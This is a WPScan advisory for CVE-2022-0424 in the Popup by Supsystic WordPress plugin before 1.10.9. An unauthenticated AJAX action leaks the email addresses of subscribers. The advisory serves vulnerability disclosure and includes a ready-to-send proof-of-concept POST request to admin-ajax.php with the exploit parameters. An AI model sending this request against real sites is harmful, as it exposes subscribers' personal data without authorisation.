WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Popup by Supsystic < 1.10.9 - Unauthenticated Subscriber Email Addresses Disclosure

Description

The plugin does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 104
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

page=subscribe&action=getListForTbl&reqType=ajax&search[text_like]=&_search=false&pl=pps&sidx=id&rows=10

Affects Plugins

popup-by-supsystic
Fixed in version 1.10.9

References

CVE
CVE-2022-0424

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10
A3: Sensitive Data Exposure
CWE
CWE-200

Miscellaneous

Original Researcher

Felipe de Avila

Submitter

Felipe de Avila

Submitter twitter
ofelipedeavila
Verified

Yes

WPVDB ID
1e4593fd-51e5-43ca-a244-9aaef3804b9f

Timeline

Publicly Published

2022-04-18 (about 3 months ago)

Added

2022-04-18 (about 3 months ago)

Last Updated

2022-04-19 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin